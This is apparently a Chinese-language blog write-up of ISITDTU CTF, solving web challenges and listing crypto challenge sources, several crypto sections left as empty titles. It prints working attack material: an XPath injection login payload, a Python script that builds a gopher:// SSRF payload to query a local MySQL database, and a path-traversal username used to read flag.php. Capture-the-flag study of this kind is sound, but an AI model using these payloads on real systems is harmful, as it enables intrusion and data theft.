Close

[ISITDTU CTF] web and crypto

在ctftime中突然看到了还有这个ctf,于是就开始做了

web

IZ

<?php 
include "config.php"; 
$number1 = rand(1,100000000000000); 
$number2 = rand(1,100000000000); 
$number3 = rand(1,100000000); 
$url = urldecode($_SERVER['REQUEST_URI']); 
$url = parse_url($url, PHP_URL_QUERY); 
if (preg_match("/_/i", $url))  
{ 
    die("..."); 
} 
if (preg_match("/0/i", $url))  
{ 
    die("..."); 
} 
if (preg_match("/\w+/i", $url))  
{ 
    die("..."); 
}     
if(isset($_GET['_']) && !empty($_GET['_'])) 
{ 
    $control = $_GET['_'];         
    if(!in_array($control, array(0,$number1))) 
    { 
        die("fail1"); 
    } 
    if(!in_array($control, array(0,$number2))) 
    { 
        die("fail2"); 
    } 
    if(!in_array($control, array(0,$number3))) 
    { 
        die("fail3"); 
    } 
    echo $flag; 
} 
show_source(__FILE__); 
?>

进入就给了源码
-w839
上网查了一下parse_url的漏洞意外的发现了这个,就是如果有三个///就会出来FALSE,前三个preg_match肯定都失败了
下面就是in_array函数了
这个函数
-w680
默认的$strict的是==FALSE==的
就是里面是弱类型就可以用一个英文字母来染过或者前面带一个零的来绕过
-w482
-w466

php_bad_language 233333

Friss

进入题目
-w447
我估计是一个ssrf
-w564
试一下file协议
-w1265
可以哟
那就读取一下index.php
-w569
有源码了,然后发现=。=下面还有一个
-w255
可以直接拿源码。。
index.php

<?php
include_once "config.php";
if (isset($_POST['url'])&&!empty($_POST['url']))
{
    $url = $_POST['url'];
    $content_url = getUrlContent($url);
}
else
{
    $content_url = "";
}
if(isset($_GET['debug']))
{
    show_source(__FILE__);
}
?>

顺便读取一下config.php
config.php

<?php
$hosts = "localhost";
$dbusername = "ssrf_user";
$dbpasswd = "";
$dbname = "ssrf";
$dbport = 3306;

$conn = mysqli_connect($hosts,$dbusername,$dbpasswd,$dbname,$dbport);

function initdb($conn)
{
    $dbinit = "create table if not exists flag(secret varchar(100));";
    if(mysqli_query($conn,$dbinit)) return 1;
    else return 0;
}
function safe($url)
{
    $tmpurl = parse_url($url, PHP_URL_HOST);
    if($tmpurl != "localhost" and $tmpurl != "127.0.0.1")
    {
        var_dump($tmpurl);
        die("<h1>Only access to localhost");
    }
    return $url;
}
function getUrlContent($url){
    $url = safe($url);
    $url = escapeshellarg($url);
    $pl = "curl ".$url;
    echo $pl;
    $content = shell_exec($pl);
    return $content;
}
initdb($conn);
?>

然后我就不会了
上网找了一下create table if not exists flag(secret varchar(100));
-w626
发现了34c3CTF web中的extract0r
就是用gopher攻击mysql
怎么样都抓不到mysql流量好气
成功抓住了需要mysql -h127.0.0.1
mysql 他默认的是socket连接
需要-h127.0.0.1才是tcp连接,才能被wireshark抓住

def result(x):
    a = [x[i:i+2] for i in xrange(0, len(x), 2)]
    return "gopher://127.0.0.1:3306/_%" + "%".join(a)

import sys

s = '''5b0000000a352e372e32332d307562756e7475302e31362e30342e310008000000623b6d786206203700fff7080200ff811500000000000000000000194462082d531d321e634e57006d7973716c5f6e61746976655f70617373776f726400b600000185a6ff0100000001210000000000000000000000000000000000000000000000726f6f7400144140598ef228ff320734fcb83ea4d7e63783c8886d7973716c5f6e61746976655f70617373776f72640065035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c045f70696404393834330f5f636c69656e745f76657273696f6e06352e372e3233095f706c6174666f726d067838365f36340c70726f6772616d5f6e616d65056d7973716c0700000200000002000000210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d697420310100000101270000020364656600000011404076657273696f6e5f636f6d6d656e74000c210018000000fd00001f00000900000308285562756e74752907000004fe000002000000120000000353454c4543542044415441424153452829010000010120000002036465660000000a44415441424153452829000c210066000000fd00001f000001000003fb07000004fe00000200000005000000027373726610000001000000024000000007010504737372660f0000000373686f772064617461626173657301000001014b0000020364656612696e666f726d6174696f6e5f736368656d6108534348454d41544108534348454d4154410844617461626173650b534348454d415f4e414d450c2100c0000000fd01000000001300000312696e666f726d6174696f6e5f736368656d6106000004056d7973716c1300000512706572666f726d616e63655f736368656d61050000060473737266040000070373797307000008fe0000220000000c0000000373686f77207461626c65730100000101560000020364656612696e666f726d6174696f6e5f736368656d610b5441424c455f4e414d45530b5441424c455f4e414d45530e5461626c65735f696e5f737372660a5441424c455f4e414d450c2100c0000000fd01000000000500000304666c616705000004047373726607000005fe0000220000000600000004666c6167002f00000103646566047373726604666c616704666c616706736563726574067365637265740c21002c010000fd0000000000fb07000002fe000002000000060000000473737266002f0000010364656604737372660473737266047373726606736572656374067365726563740c21002c010000fd0000000000fb07000002fe000002000000130000000373656c656374202a2066726f6d20666c616701000001012e00000203646566047373726604666c616704666c616706736563726574067365637265740c21002c010000fd000000000007000003fe000022000000'''
print result(s)

我的mysql
得到的payload输入就可以得到flag了

Access Box

又是一道登录的题目=。=
-w273
首先看到了这个尝试一下,发现可以登录进去
-w230
扫波站,会发现有一个accounts.xml
-w438
莫名其妙的有了账号密码
登录就有flag。我觉得应该不是这样做的
貌似是xpath注入
username='and 1=0] | //*[contains(.,'guest')] | //*['1'='0&password=lala
这是payload
然后就需要fuzz了

Adm1n
Administrator
ColdTick
Ez_t0_gu3ss_PaSSw0rd
FromD2VNWithLove
guest

可以得到这些然后登录就行了

NNservice

还是登录噗=。=
nikto 扫一波
-w650
发现有一个文件夹在robots.txt
把那个bk.zip下载下来之后
-w1280
有所有的源码
给了hint说flag在flag.php中
说明这道题的目的肯定是人以文件读取
就不在注入上下功夫了
找到一处== 在strpos 处
-w760
肯定可以在这个地方做文章因为当..在一开始的位置的时候strpos为0就跟false相等了
然后看之前是怎么把数据存进去的,会发现他是先把数据存进去然后在进行判断是否有..
-w655
路劲是用户名和图片名字放一起存放的
所以只要注册一个名字带有..的用户名就可以了

CREATE TABLE IF NOT EXISTS `users` (
  `id` int(32) primary key auto_increment,
  `username` varchar(100) UNIQUE KEY,
  `nickname` varchar(100) UNIQUE KEY,
  `password` varchar(32),
  `email` varchar(100) UNIQUE KEY
);

CREATE TABLE IF NOT EXISTS `articles` (
  `id` int(32) primary key auto_increment,
  `user_id` int(32),
  `title` varchar(100),
  `content` varchar(500)
);

CREATE TABLE IF NOT EXISTS `avatar` (
    `id` int(32) primary key auto_increment,
    `data` blob,
    `user_id` int(32) UNIQUE KEY,
    `filepath` varchar(100),
    `photo_type` varchar(20)
);

给了sql文件
可以看出filepath 和 user的id都100
所以只要注册一个长度为100的用户名后面的图片名称就无所谓了
所以注册用户名:..//////////////////////////////////////////////////////////////////////////////////////////flag.php
edit处随意上传一张图片
export处导出数据,便可获得flag。

Crypto

学习crypto从这个暑假开始

XOR

题目

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flag import flag,key

assert len(key) == 10

if len(flag) % len(key) != 0:
    n = len(key) - len(flag) % len(key)
    for i in range(n):
        flag += " "
m = []
for a in range(len(key)):
    i = a
    for b in range(len(flag)/len(key)):
        if b % 2 != 0:
            m.append(ord(flag[i]) ^ ord(key[a]))
        else:
            m.append(ord(flag[i+len(key)-(a+1+a)])^ ord(key[a]))
        i += len(key)
enc_flag = ""
for j in range(len(m)):
    enc_flag += "%02x" % m[j]

print enc_flag

Baby

import os
import socket
import threading
from hashlib import *
import SocketServer
import random
from flag import flag
host, port = '0.0.0.0', 33337
BUFF_SIZE = 1024

class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    allow_reuse_address = True

class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):

    def hash(self, m):
        f = int(flag.encode("hex"),16)
        x = sha512(str(f | m )).digest().encode("hex")
        self.request.sendall(x+"\n")




    def check(self):
        while True:
            self.request.sendall("********************Hello World********************\n")
            self.request.sendall("***************************************************\n")
            self.request.sendall("Number: ")
            try:
                number = int(self.request.recv(BUFF_SIZE).strip())
            except:
                break
            self.request.sendall(str(number)+"\n")
            self.hash(number)

    def handle(self):
        self.request.settimeout(1)        
        self.check()



def main():
    server = ThreadedTCPServer((host, port), ThreadedTCPRequestHandler)
    server_thread = threading.Thread(target=server.serve_forever)
    server_thread.daemon = True
    server_thread.start()
    print "Server loop running in thread:", server_thread.name
    server_thread.join()

if __name__=='__main__':
    main()

Love CryptoGraphy

Simple RSA

aes_cnv

ecc

Leave a Reply

Your email address will not be published. Required fields are marked *